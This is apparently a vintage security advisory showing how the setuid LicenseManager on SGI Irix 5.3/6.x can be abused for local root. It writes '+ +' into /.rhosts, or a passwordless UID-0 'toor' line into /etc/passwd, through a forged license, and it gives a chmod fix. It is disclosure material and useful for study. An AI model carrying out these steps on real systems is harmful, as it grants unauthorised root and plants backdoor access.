For your convenience, a new, fast, reliable way to get root on your local
SGI is given below.  It works on Irix 5.3 and 6.x with
license_eoe.sw.license_eoe installed, which I believe is default (I found it
installed on several independent Irix installations).  5.2 doesn't seem to
have it.

This exploit was made possible by developers who make big, fat programs like
LicenseManager suid.

Short background:  LicenseManager is GUI to license subsystem.  It allows
to install/remove/update FLEXlm and NET_LS licenses.  Any regular user with
access to X screen can run it, and it's suid.  It will allow anyone to
install licenses, and will prompt for root password if one wants to remove
one.  And that's about all protection it has.

% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &

Install...
NetLS Node-locked
Vendor Name: whatever
Vendor ID: + +
Product name: whatever
License version: 1.000
License version:
Expiration date: 01-jan-0

(in license version field I put space)

Apply

License(s) succesfully installed

% cat /.rhosts
#:# "whatever" "whatever" "1.000" "Incomplete"
+ +

If your system has remote root logins disabled, replacing /.rhosts with
/etc/passwd and + + with toor:0:0::/:/bin/sh will be helpful.

How to fix:

chmod -s /usr/etc/LicenseManager